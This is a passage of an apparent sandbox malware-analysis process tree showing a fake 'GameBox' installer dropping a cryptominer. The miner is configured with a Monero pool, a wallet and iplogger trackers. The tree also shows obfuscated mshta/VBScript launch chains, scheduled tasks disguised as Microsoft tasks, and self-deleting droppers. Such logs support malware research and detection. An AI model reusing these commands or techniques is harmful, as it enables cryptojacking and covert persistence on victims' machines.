                                                                        "C:\Users\Admin\AppData\Local\Temp\is-UPO5M.tmp\Setup.exe" /Verysilent
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        PID:5720
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:5776
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-IGKHR.tmp\Stats.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-IGKHR.tmp\Stats.tmp" /SL5="$3038C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:6084
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-OSJRQ.tmp\builder.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-OSJRQ.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                              7⤵
                                                                                PID:7060
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:5840
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 756
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:6148
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 780
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:4128
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 740
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:2060
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 832
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:6784
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 1056
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:4620
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 1100
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:2064
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 1084
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:6288
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 1112
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:3900
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 1448
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:7348
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 920
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:7808
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                            5⤵
                                                                              PID:5896
                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579443 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                6⤵
                                                                                  PID:2032
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:6036
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-TH9SP.tmp\WEATHER Manager.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-TH9SP.tmp\WEATHER Manager.tmp" /SL5="$103B6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5432
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-4FR71.tmp\Setup.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-4FR71.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                    7⤵
                                                                                      PID:4624
                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-4FR71.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-4FR71.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579443 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                        8⤵
                                                                                          PID:3536
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5968
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-612EV.tmp\VPN.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-612EV.tmp\VPN.tmp" /SL5="$103CE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5620
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-FEVHQ.tmp\Setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-FEVHQ.tmp\Setup.exe" /silent /subid=720
                                                                                        7⤵
                                                                                          PID:416
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-QJQ4N.tmp\Setup.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-QJQ4N.tmp\Setup.tmp" /SL5="$1051E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-FEVHQ.tmp\Setup.exe" /silent /subid=720
                                                                                            8⤵
                                                                                              PID:4552
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                9⤵
                                                                                                  PID:2332
                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                    tapinstall.exe remove tap0901
                                                                                                    10⤵
                                                                                                      PID:8880
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                    9⤵
                                                                                                      PID:7280
                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                                        10⤵
                                                                                                          PID:7412
                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                        9⤵
                                                                                                          PID:9772
                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                          9⤵
                                                                                                            PID:9668
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:6020
                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                      6⤵
                                                                                                        PID:5452
                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5304
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-1GKM1.tmp\MediaBurner2.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-1GKM1.tmp\MediaBurner2.tmp" /SL5="$2035E,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5952
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-18RM8.tmp\ultradumnibour.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-18RM8.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                          7⤵
                                                                                                            PID:932
                                                                                                            • C:\Program Files\Windows Defender\FLBTRKGUQN\ultramediaburner.exe
                                                                                                              "C:\Program Files\Windows Defender\FLBTRKGUQN\ultramediaburner.exe" /VERYSILENT
                                                                                                              8⤵
                                                                                                                PID:4236
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-A9R44.tmp\ultramediaburner.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-A9R44.tmp\ultramediaburner.tmp" /SL5="$601FC,281924,62464,C:\Program Files\Windows Defender\FLBTRKGUQN\ultramediaburner.exe" /VERYSILENT
                                                                                                                  9⤵
                                                                                                                    PID:4572
                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                      10⤵
                                                                                                                        PID:7156
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3b-0c6fb-fae-d37b2-e41d30ada99df\Jaegaevaebeno.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\3b-0c6fb-fae-d37b2-e41d30ada99df\Jaegaevaebeno.exe"
                                                                                                                    8⤵
                                                                                                                      PID:7764
                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                        dw20.exe -x -s 2260
                                                                                                                        9⤵
                                                                                                                          PID:9576
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\29-086ad-3d8-e31b8-75a9bab5e66ac\Xyshebawifu.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\29-086ad-3d8-e31b8-75a9bab5e66ac\Xyshebawifu.exe"
                                                                                                                        8⤵
                                                                                                                          PID:7056
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hytn4pkt.uyf\GcleanerEU.exe /eufive & exit
                                                                                                                            9⤵
                                                                                                                              PID:9132
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\hytn4pkt.uyf\GcleanerEU.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\hytn4pkt.uyf\GcleanerEU.exe /eufive
                                                                                                                                10⤵
                                                                                                                                  PID:4712
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hytn4pkt.uyf\GcleanerEU.exe" & exit
                                                                                                                                    11⤵
                                                                                                                                      PID:9468
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /im "GcleanerEU.exe" /f
                                                                                                                                        12⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:9932
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uxdo2vn0.34l\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                  9⤵
                                                                                                                                    PID:2264
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\uxdo2vn0.34l\installer.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\uxdo2vn0.34l\installer.exe /qn CAMPAIGN="654"
                                                                                                                                      10⤵
                                                                                                                                        PID:2936
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wfjwrdse.kw5\anyname.exe & exit
                                                                                                                                      9⤵
                                                                                                                                        PID:5288
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\wfjwrdse.kw5\anyname.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\wfjwrdse.kw5\anyname.exe
                                                                                                                                          10⤵
                                                                                                                                            PID:1924
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\wfjwrdse.kw5\anyname.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\wfjwrdse.kw5\anyname.exe" -q
                                                                                                                                              11⤵
                                                                                                                                                PID:7520
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rpseygdx.thk\gcleaner.exe /mixfive & exit
                                                                                                                                            9⤵
                                                                                                                                              PID:1368
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\rpseygdx.thk\gcleaner.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\rpseygdx.thk\gcleaner.exe /mixfive
                                                                                                                                                10⤵
                                                                                                                                                  PID:2036
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\rpseygdx.thk\gcleaner.exe" & exit
                                                                                                                                                    11⤵
                                                                                                                                                      PID:9368
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /im "gcleaner.exe" /f
                                                                                                                                                        12⤵
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:10092
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4fsy1yma.tmg\autosubplayer.exe /S & exit
                                                                                                                                                  9⤵
                                                                                                                                                    PID:3960
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:6004
                                                                                                                                            • C:\Users\Admin\Documents\aU_YWnG4yVqX1HKY_nk55eIu.exe
                                                                                                                                              "C:\Users\Admin\Documents\aU_YWnG4yVqX1HKY_nk55eIu.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4440
                                                                                                                                              • C:\Users\Admin\Documents\aU_YWnG4yVqX1HKY_nk55eIu.exe
                                                                                                                                                "C:\Users\Admin\Documents\aU_YWnG4yVqX1HKY_nk55eIu.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:7872
                                                                                                                                              • C:\Users\Admin\Documents\bysdIHr3sfeItWYgHezLLInx.exe
                                                                                                                                                "C:\Users\Admin\Documents\bysdIHr3sfeItWYgHezLLInx.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:5684
                                                                                                                                                  • C:\Users\Admin\Documents\bysdIHr3sfeItWYgHezLLInx.exe
                                                                                                                                                    C:\Users\Admin\Documents\bysdIHr3sfeItWYgHezLLInx.exe
                                                                                                                                                    7⤵
                                                                                                                                                      PID:7016
                                                                                                                                                    • C:\Users\Admin\Documents\bysdIHr3sfeItWYgHezLLInx.exe
                                                                                                                                                      C:\Users\Admin\Documents\bysdIHr3sfeItWYgHezLLInx.exe
                                                                                                                                                      7⤵
                                                                                                                                                        PID:7288
                                                                                                                                                    • C:\Users\Admin\Documents\Wkd_IwW3lZQKXYTwmGnRS8am.exe
                                                                                                                                                      "C:\Users\Admin\Documents\Wkd_IwW3lZQKXYTwmGnRS8am.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:6472
                                                                                                                                                      • C:\Users\Admin\Documents\PhJGQeYiwZqTAsttVmEvuymW.exe
                                                                                                                                                        "C:\Users\Admin\Documents\PhJGQeYiwZqTAsttVmEvuymW.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:4324
                                                                                                                                                      • C:\Users\Admin\Documents\9i0RAi3XOEFSUZ8c7wJwQ7kZ.exe
                                                                                                                                                        "C:\Users\Admin\Documents\9i0RAi3XOEFSUZ8c7wJwQ7kZ.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:4980
                                                                                                                                                        • C:\Users\Admin\Documents\3ON_3kz6oY2EsUftO3Gw2CaB.exe
                                                                                                                                                          "C:\Users\Admin\Documents\3ON_3kz6oY2EsUftO3Gw2CaB.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:6316
                                                                                                                                                          • C:\Users\Admin\Documents\Pnn0t45N8ZWrVtASDI8fXtqx.exe
                                                                                                                                                            "C:\Users\Admin\Documents\Pnn0t45N8ZWrVtASDI8fXtqx.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:6164
                                                                                                                                                            • C:\Users\Admin\Documents\jO7aNJcU1zP6Qr3Erd6h46vt.exe
                                                                                                                                                              "C:\Users\Admin\Documents\jO7aNJcU1zP6Qr3Erd6h46vt.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:2184
                                                                                                                                                                • C:\Users\Admin\Documents\jO7aNJcU1zP6Qr3Erd6h46vt.exe
                                                                                                                                                                  C:\Users\Admin\Documents\jO7aNJcU1zP6Qr3Erd6h46vt.exe
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:5144
                                                                                                                                                                  • C:\Users\Admin\Documents\jO7aNJcU1zP6Qr3Erd6h46vt.exe
                                                                                                                                                                    C:\Users\Admin\Documents\jO7aNJcU1zP6Qr3Erd6h46vt.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:7460
                                                                                                                                                                  • C:\Users\Admin\Documents\HlYxujVaZy5CFDwiHqHEEiSH.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\HlYxujVaZy5CFDwiHqHEEiSH.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:4888
                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\HlYxujVaZy5CFDwiHqHEEiSH.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\HlYxujVaZy5CFDwiHqHEEiSH.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:3940
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\HlYxujVaZy5CFDwiHqHEEiSH.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\HlYxujVaZy5CFDwiHqHEEiSH.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:8732
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                              WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:8884
                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:8852
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:9140
                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:820
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill -IM "HlYxujVaZy5CFDwiHqHEEiSH.exe" -f
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:8944
                                                                                                                                                                              • C:\Users\Admin\Documents\AK7homVur4oc_gp9P05u7HR6.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\AK7homVur4oc_gp9P05u7HR6.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6432
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6115320.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6115320.exe"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:6992
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8130877.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8130877.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:180
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3420027.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\3420027.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:7948
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2695970.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2695970.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:2172
                                                                                                                                                                                      • C:\Users\Admin\Documents\wvGHzJiTuL2OEZYs1karrrwd.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\wvGHzJiTuL2OEZYs1karrrwd.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:5540
                                                                                                                                                                                        • C:\Users\Admin\Documents\yV6I5WIwllMVof7zYgboTmvI.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\yV6I5WIwllMVof7zYgboTmvI.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:6340
                                                                                                                                                                                            • C:\Users\Admin\Documents\yV6I5WIwllMVof7zYgboTmvI.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\yV6I5WIwllMVof7zYgboTmvI.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:7740
                                                                                                                                                                                            • C:\Users\Admin\Documents\4oviFLCs71JXnyx2mN7P4eVa.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\4oviFLCs71JXnyx2mN7P4eVa.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:4776
                                                                                                                                                                                              • C:\Users\Admin\Documents\Cl7EfPufqnQ2YFzfxbsFUzQq.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\Cl7EfPufqnQ2YFzfxbsFUzQq.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:6908
                                                                                                                                                                                                  • C:\Users\Admin\Documents\Cl7EfPufqnQ2YFzfxbsFUzQq.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\Cl7EfPufqnQ2YFzfxbsFUzQq.exe"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:228
                                                                                                                                                                                                  • C:\Users\Admin\Documents\hWCRkIR4vauF4zOiJwYV6J7D.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\hWCRkIR4vauF4zOiJwYV6J7D.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:6932
                                                                                                                                                                                                    • C:\Users\Admin\Documents\a81QTgVeguj8gEyJyfq75gb_.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\a81QTgVeguj8gEyJyfq75gb_.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:296
                                                                                                                                                                                                      • C:\Users\Admin\Documents\GaBbhM8QweBtEitvfYAXuMW6.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\GaBbhM8QweBtEitvfYAXuMW6.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:6116
                                                                                                                                                                                                        • C:\Users\Admin\Documents\vxJF19pwBrzIGXHAksSpwN3g.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\vxJF19pwBrzIGXHAksSpwN3g.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:6040
                                                                                                                                                                                                          • C:\Users\Admin\Documents\YcU4LTT7orIadzWaLcYi2nXE.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\YcU4LTT7orIadzWaLcYi2nXE.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:6880
                                                                                                                                                                                                            • C:\Users\Admin\Documents\IEfQPxN0JHhv9q42aENz5Nbf.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\IEfQPxN0JHhv9q42aENz5Nbf.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:7276
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "IEfQPxN0JHhv9q42aENz5Nbf.exe" /f & erase "C:\Users\Admin\Documents\IEfQPxN0JHhv9q42aENz5Nbf.exe" & exit
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:7700
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill /im "IEfQPxN0JHhv9q42aENz5Nbf.exe" /f
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:4160
                                                                                                                                                                                                                • C:\Users\Admin\Documents\q5yK4WtyqlTuHei5YnglHxoE.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\q5yK4WtyqlTuHei5YnglHxoE.exe"
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:7268
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\q5yK4WtyqlTuHei5YnglHxoE.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\q5yK4WtyqlTuHei5YnglHxoE.exe" -q
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:6468
